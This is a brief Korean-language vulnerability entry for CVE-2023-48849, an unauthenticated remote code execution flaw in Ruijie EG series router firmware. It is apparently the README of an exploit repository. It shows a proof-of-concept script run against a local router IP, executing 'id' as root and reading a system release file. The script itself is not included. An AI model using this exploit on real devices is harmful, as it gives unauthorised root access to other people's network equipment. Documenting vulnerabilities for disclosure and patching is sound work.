CVE-2023-48849
Ruijie EG 시리즈 라우터 펌웨어 <=EG_3.0(1)B11P216은 잘못된 필터링으로 인해 인증되지 않은 공격자가 원격으로 임의 코드를 실행할 수 있도록 허용합니다.
$ python3 poc.py 192.168.1.1 'id'
uid=0(root) gid=0(root)
$ python3 poc.py 192.168.1.1 'grep TARGET /etc/openwrt_release'
DISTRIB_TARGET='mediatek/eg310gh-e'
데모